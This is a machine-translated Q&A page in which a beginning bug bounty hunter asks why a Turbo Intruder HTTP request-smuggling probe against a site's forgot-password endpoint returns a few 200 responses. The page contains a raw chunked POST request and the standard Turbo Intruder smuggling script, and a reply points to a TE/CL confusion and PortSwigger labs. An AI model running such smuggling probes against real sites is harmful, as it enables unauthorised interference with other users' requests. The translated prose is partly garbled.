Fatal编程技术网
  • security/
  • Security 使用涡轮入侵者时的奇怪反应

Security 使用涡轮入侵者时的奇怪反应

security

Security 使用涡轮入侵者时的奇怪反应,security,request,burp,Security,Request,Burp,我是一个臭虫赏金猎人,对它还不熟悉。几天前,我读到了有关请求走私漏洞的信息。就在那之后,我开始在网上找到它。昨天,我发现一个网站,当我在标题中添加X-Forwarded-Host:google.com时,它将我重定向到了。很难利用这一点,所以我考虑将其与请求走私结合起来。我选择更改密码请求作为目标: POST /my-rx/forgot-password HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 10.0

我是一个臭虫赏金猎人,对它还不熟悉。几天前,我读到了有关请求走私漏洞的信息。就在那之后,我开始在网上找到它。昨天,我发现一个网站,当我在标题中添加X-Forwarded-Host:google.com时,它将我重定向到了。很难利用这一点,所以我考虑将其与请求走私结合起来。我选择更改密码请求作为目标:

POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1

email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
然后我用涡轮入侵者运行它。我非常惊讶,它发送了14个请求,但只有12个请求是503,剩下的2个是200。特别是,在200响应头中,它有…传输编码:chunked。。。。我试过几次,结果都是一样的:1到2个请求就是200个。但在代码中,有一点很奇怪,就是…prefix='GET/hoppully404http/1.1 X-忽略:X'。。。。经过几次测试后,我认为这不是请求走私错误,因为响应显示它是原始请求的响应,而不是代码中的前缀,我也尝试更改前缀,它仍然是200,而不是400,404。。。就像我预料的那样

那么有没有人一定是非常专业的黑客知道我面临什么漏洞?谢谢大家!

首先,你的第一次转化的reuest是在TE中分块的;CL,但在使用打嗝扩展后,您找到了它的CL;所以问题可能就在那里。 对于您有点困惑的回答,我建议您解决portswigger http请求走私实验室,因为我最近已经完成了这项工作,您的基础将变得非常强大

POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3



0

# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):

    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)